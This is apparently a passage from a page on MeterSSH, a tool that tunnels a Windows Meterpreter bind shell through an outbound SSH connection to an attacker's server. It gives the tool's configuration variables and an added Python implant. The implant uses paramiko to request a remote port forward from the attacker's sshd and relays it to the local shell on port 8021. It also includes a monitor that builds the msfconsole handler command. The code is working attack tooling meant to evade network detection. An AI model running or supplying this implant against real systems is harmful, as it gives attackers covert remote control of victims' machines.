# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"

  • user – the user account on the attacker's SSH server (do not use root; root is not needed)
  • password – the password for the attacker's SSH server
  • rhost – the attacker's SSH server IP address
  • port – the attacker's SSH server port

Note that you DO NOT need to change the Metasploit shellcode: it is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, swap the shellcode out and change port 8021 inside the script to whatever port you want to bind to. You do not need to do this unless you want to customize or modify it.
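
The moving parts described above, as an added example that is not MeterSSH's code: the monitor side polls the attacker's own loopback for port 8021 and, once the tunnel brings it up, starts a multi/handler for the bind payload pointed at 127.0.0.1; the implant side asks the attacker's sshd for a remote port forward with paramiko and relays each accepted channel to the bind shell on its own loopback. The handler command, the relay and the throwaway listener are this example's choices; nothing here injects shellcode, and the paramiko part is only exercised when you call it with a real SSH server.

```python
import select
import socket
import threading
import time

TUNNEL_PORT = 8021  # the bind_tcp port the page's unmodified shellcode uses


def port_open(host, port, timeout=0.5):
    """True if a TCP connect to host:port succeeds within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_port(host, port, timeout=30.0, interval=0.25):
    """Poll until the tunnelled port appears on our loopback (monitor.py's
    job), or give up after timeout seconds."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if port_open(host, port):
            return True
        time.sleep(interval)
    return False


def handler_command(port=TUNNEL_PORT, payload="windows/meterpreter/bind_tcp"):
    """msfconsole invocation for a bind payload: the handler connects out to
    RHOST:LPORT, which through the tunnel is our own loopback."""
    rc = (f"use exploit/multi/handler; set PAYLOAD {payload}; "
          f"set RHOST 127.0.0.1; set LPORT {port}; exploit")
    return ["msfconsole", "-q", "-x", rc]


def relay(chan, host, port):
    """Pump bytes both ways between an accepted SSH channel and a local socket."""
    sock = socket.create_connection((host, port))
    try:
        while True:
            readable, _, _ = select.select([sock, chan], [], [])
            if sock in readable:
                data = sock.recv(4096)
                if not data:
                    break
                chan.sendall(data)
            if chan in readable:
                data = chan.recv(4096)
                if not data:
                    break
                sock.sendall(data)
    finally:
        chan.close()
        sock.close()


def reverse_forward(ssh_host, ssh_port, user, password,
                    remote_port=TUNNEL_PORT, local_port=TUNNEL_PORT):
    """Implant side via paramiko's remote port forward: the attacker's sshd
    listens on remote_port and each accepted connection is relayed to the
    bind shell on this machine's local_port."""
    import paramiko  # imported here so the rest of the file runs without it
    client = paramiko.SSHClient()
    # Accepting any host key keeps the implant simple, but it also lets anyone
    # who can intercept the connection impersonate the attacker's server.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ssh_host, port=ssh_port, username=user, password=password)
    transport = client.get_transport()
    transport.request_port_forward("127.0.0.1", remote_port)
    while True:
        chan = transport.accept(1000)
        if chan is not None:
            threading.Thread(target=relay, args=(chan, "127.0.0.1", local_port),
                             daemon=True).start()


def loopback_listener():
    """Bind a throwaway listener on 127.0.0.1 so the polling can be exercised
    without a real tunnel."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


if __name__ == "__main__":
    # monitor.py's loop in miniature: wait for the tunnel, then start the handler
    if wait_for_port("127.0.0.1", TUNNEL_PORT, timeout=5.0):
        print("tunnel is up, run:", " ".join(handler_command()))
    else:
        print("no tunnel on 127.0.0.1:%d yet" % TUNNEL_PORT)
```

Because the forward is bound to 127.0.0.1 on the attacker's sshd, the Meterpreter port is never exposed beyond that host; from the network's point of view the victim only ever holds one outbound SSH session, which is the whole point of the technique. Note that the SSH password sits in the script in the clear, so a recovered meterssh.py gives a defender valid credentials for the attacker's server.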

More information can be found at: https://github.com/trustedsec/meterssh